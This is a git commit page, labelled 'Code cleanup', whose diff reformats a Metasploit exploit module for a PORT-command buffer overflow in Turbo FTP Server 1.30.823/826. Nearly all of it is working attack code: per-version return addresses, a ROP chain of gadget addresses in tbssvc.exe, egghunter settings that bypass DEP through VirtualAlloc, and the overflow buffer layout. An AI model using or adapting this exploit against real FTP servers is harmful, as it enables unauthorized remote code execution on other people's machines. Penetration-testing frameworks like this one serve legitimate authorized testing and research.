Code cleanup
This commit is contained in:
parent
6bccfcd376
commit
72d70b6bc2
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
#
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -24,49 +20,45 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
This module exploits the buffer overflow found in the PORT
|
||||
command in Turbo FTP Server 1.30.823 & 1.30.826.
|
||||
},
|
||||
'Author' => [
|
||||
'Zhao Liang', #Initial Descovery
|
||||
'Lincoln', #Metasploit
|
||||
'corelanc0d3r', #Metasploit
|
||||
'thelightcosine',#Metasploit
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'Zhao Liang', #Initial Descovery
|
||||
'Lincoln', #Metasploit
|
||||
'corelanc0d3r', #Metasploit
|
||||
'thelightcosine' #Metasploit
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$',
|
||||
'Platform' => [ 'win' ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '85887' ],
|
||||
[ 'OSVDB', '85887' ]
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00",
|
||||
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
|
||||
'EncoderOptions' =>
|
||||
{
|
||||
'BufferRegister' => 'EDI',
|
||||
}
|
||||
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00",
|
||||
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
|
||||
'EncoderOptions' => { 'BufferRegister' => 'EDI' }
|
||||
},
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {} ],
|
||||
['Windows Universal TurboFtp 1.30.823',
|
||||
{
|
||||
'Ret' => 0x00411985, # RETN (ROP NOP) [tbssvc.exe]
|
||||
'ver' => 823
|
||||
'Ret' => 0x00411985, # RETN (ROP NOP) [tbssvc.exe]
|
||||
'ver' => 823
|
||||
},
|
||||
|
||||
],
|
||||
[ 'Windows Universal TurboFtp 1.30.826',
|
||||
{
|
||||
'Ret' => 0x004fb207, # RETN (ROP NOP) [tbssvc.exe]
|
||||
'ver' => 826
|
||||
'Ret' => 0x004fb207, # RETN (ROP NOP) [tbssvc.exe]
|
||||
'ver' => 826
|
||||
},
|
||||
],
|
||||
],
|
||||
|
||||
'DisclosureDate' => 'Oct 03 2012',
|
||||
'DefaultTarget' => 1))
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def check
|
||||
|
@ -82,7 +74,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
def create_rop_chain(ver)
|
||||
|
||||
# rop chain generated with mona.py - www.corelan.be
|
||||
if ver == 823
|
||||
rop_gadgets =
|
||||
|
@ -93,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
0x00423b95, # XCHG EDX,EDI # RETN [tbssvc.exe]
|
||||
0x00423a27, # XCHG ESI,EDI # RETN [tbssvc.exe]
|
||||
0x005d1c99, # POP EBP # RETN [tbssvc.exe]
|
||||
0x004cad5d , # & jmp esp [tbssvc.exe]
|
||||
0x004cad5d, # & jmp esp [tbssvc.exe]
|
||||
0x004ab16b, # POP EBX # RETN [tbssvc.exe]
|
||||
0x00000001, # 0x00000001-> ebx
|
||||
0x005ef7f6, # POP EDX # RETN [tbssvc.exe]
|
||||
|
@ -135,7 +126,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
|
||||
my_target = target
|
||||
if my_target.name == 'Automatic'
|
||||
print_status("Automatically detecting the target")
|
||||
|
@ -162,11 +152,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
eggoptions =
|
||||
{
|
||||
:checksum => true,
|
||||
:eggtag => 'w00t',
|
||||
:depmethod => 'virtualalloc',
|
||||
:depreg => 'esi'
|
||||
:checksum => true,
|
||||
:eggtag => 'w00t',
|
||||
:depmethod => 'virtualalloc',
|
||||
:depreg => 'esi'
|
||||
}
|
||||
|
||||
badchars = "\x00"
|
||||
hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)
|
||||
|
||||
|
@ -182,7 +173,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
buf1 = rand_text_alpha(2012)
|
||||
buf1 << egg
|
||||
buf1 << rand_text_alpha(100)
|
||||
buf1 << rand_text_alpha(100)
|
||||
|
||||
buf2 = rand_text_alpha(4).unpack('C*').join(',')
|
||||
buf2 << ","
|
||||
|
|
Loading…
Reference in New Issue